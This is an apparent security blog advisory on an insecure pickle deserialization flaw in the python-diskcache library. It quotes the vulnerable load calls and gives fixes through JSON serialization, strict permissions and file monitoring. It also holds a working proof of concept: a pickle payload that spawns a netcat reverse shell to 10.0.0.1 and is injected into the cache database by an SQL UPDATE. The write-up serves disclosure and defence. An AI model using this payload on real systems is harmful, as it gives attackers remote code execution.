Feb 12, 2026·6 min read·44 visits
DiskCache uses Python's `pickle` module by default to serialize data to disk. Because `pickle` is inherently unsafe, anyone with write access to the cache directory (e.g., via shared permissions or container volumes) can inject a payload that executes arbitrary code when the application reads from the cache.
A critical insecure deserialization vulnerability in the popular python-diskcache library allows local attackers to achieve arbitrary code execution. By manipulating the underlying SQLite database or cache files, an attacker can trick the application into unpickling a malicious payload.
We all love caching. It's the duct tape of the internet. When your Django app starts wheezing under the load of a thousand users, you slap a cache on it. And if you don't want to spin up a Redis instance because you're cheap (or 'efficient'), you reach for diskcache. It's brilliant, really. It uses SQLite and the local filesystem to store data, claiming to be faster than Redis in some benchmarks. Millions of downloads, used in AWS Lambda, machine learning pipelines, and scraping bots everywhere.
But here's the rub: diskcache needed a way to store complex Python objects—custom classes, functions, the whole nine yards. JSON is too restrictive (it doesn't know what a datetime object is), so the developers reached for the forbidden fruit: Pickle.
If you've been in security for more than five minutes, your blood pressure just spiked. Python's pickle module is a serialization format that effectively allows for arbitrary code execution by design. Trusting pickle is like trusting a stranger to hold your wallet while you go for a swim. In CVE-2025-69872, we find out exactly what happens when that stranger decides to go shopping.
The core philosophy of diskcache seems to be: "If it's on the local disk, it must be safe." This is a classic fallacy. In modern infrastructure—especially containerized environments like Kubernetes—the filesystem is a shared resource. We have shared volumes, /tmp directories with loose permissions, and multi-tenant systems.
The vulnerability is architectural. diskcache essentially creates a SQLite database (cache.db) to manage keys and metadata, and stores the actual values either inside the database or as loose files (.val) in the directory. When you call .get(key), the library fetches the blob and passes it straight to pickle.load().
There is no cryptographic signature. There is no HMAC. There is no sandbox. The library assumes that no one else could possibly write to that directory. If an attacker can modify a .val file or execute a SQL UPDATE query on the cache.db file, they turn the application's next cache retrieval into a Remote Code Execution (RCE) event.
Let's crack open diskcache/core.py and look at the horror show. We are looking for the deserialization trigger points. We don't have to look hard.
# diskcache/core.py (Simplified for effect)
def get(self, key, default=None, ...):
# ... logic to find the file ...
if mode == MODE_PICKLE:
try:
# HERE IS THE DRAGON
with open(filename, 'rb') as reader:
return pickle.load(reader)
except (KeyError, ValueError, pickle.PickleError):
passIt's naked. Just pickle.load(reader).
The vulnerability also exists when reading keys or values directly from the SQLite database. If the data is small enough, diskcache inlines it into the database blob.
# Inside the fetch logic
val = cursor.execute('SELECT value FROM cache WHERE key=?', (key,)).fetchone()
if val:
# AND HERE IS ANOTHER DRAGON
return pickle.loads(val[0])This isn't a bug in the code per se; the code is doing exactly what it was designed to do. The bug is the design itself. It prioritizes the ability to store complex Python objects over the security of the runtime environment.
Exploiting this requires a bit of setup, but it's trivial if you have filesystem access. Imagine a scenario where a web application runs as www-data and stores its cache in /var/tmp/django_cache. If that directory is world-writable (a surprisingly common sin), or if we have compromised a low-privilege service that shares that volume, we are in business.
We don't need to overflow a buffer or align a heap spray. We just need to serialize a Python class with a __reduce__ method. This magic method tells the pickler: "Hey, when you unpickle me, don't just restore my data—run this function instead."
Here is a weaponized Proof of Concept. We create a payload that spawns a reverse shell, and we inject it directly into the SQLite database that diskcache uses.
import pickle
import sqlite3
import os
# 1. Craft the Payload
class ApocalypseNow:
def __reduce__(self):
cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1337 >/tmp/f"
return (os.system, (cmd,))
payload = pickle.dumps(ApocalypseNow())
# 2. Open the Victim's Cache DB
# Assume we found this at /tmp/cache/cache.db
conn = sqlite3.connect('/tmp/cache/cache.db')
cursor = conn.cursor()
# 3. Poison a valid key
# We overwrite an existing key so the next time the app asks for it, BOOM.
target_key = "user_session_12345"
# DiskCache stores keys as BLOBs too, usually pickled.
# We update the VALUE associated with that key.
# (Note: In reality, you might need to pickle the key to match the DB schema)
cursor.execute(
"UPDATE Cache SET value = ? WHERE rowid = 1",
(payload,)
)
conn.commit()
conn.close()
print("[+] Cache poisoned. Waiting for victim to wake up...")The next time the victim application runs cache.get("user_session_12345"), the pickle.load() executes our reverse shell command. Game over.
Why is this a high-severity issue? Because caching libraries are often implicitly trusted. Developers treat them as internal, opaque storage. They don't sanitize data coming out of the cache because they assume they put it in.
The consequences are severe:
This isn't just about reading data; it's about hijacking the control flow of the application process itself.
The remediation here is straightforward but potentially painful if your application relies on pickling custom objects.
1. Switch to JSON Serialization
DiskCache supports pluggable backends. The safest move is to stop using pickle entirely. Switch to the JSONDisk backend. It only supports standard JSON types (dicts, lists, strings, numbers), but it won't execute code when reading data.
from diskcache import Cache, JSONDisk
# The Safe Way
cache = Cache('/path/to/cache', disk=JSONDisk)2. Strict Filesystem Permissions If you must use pickle (e.g., you are caching complex NumPy arrays or custom objects), you must treat the cache directory like a private key.
3. Monitoring
Set up file integrity monitoring (FIM) on your cache directories. If an external process modifies a .db or .val file, trigger an alarm immediately. That is not normal behavior.
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
python-diskcache Grant Jenks | <= 5.6.3 | N/A (Requires Config Change) |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-502 |
| Attack Vector | Local (File Manipulation) |
| CVSS | 7.3 (High) |
| Impact | Arbitrary Code Execution |
| Exploit Status | PoC Available |
| Affected Component | diskcache.core.Cache.get() |
The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid.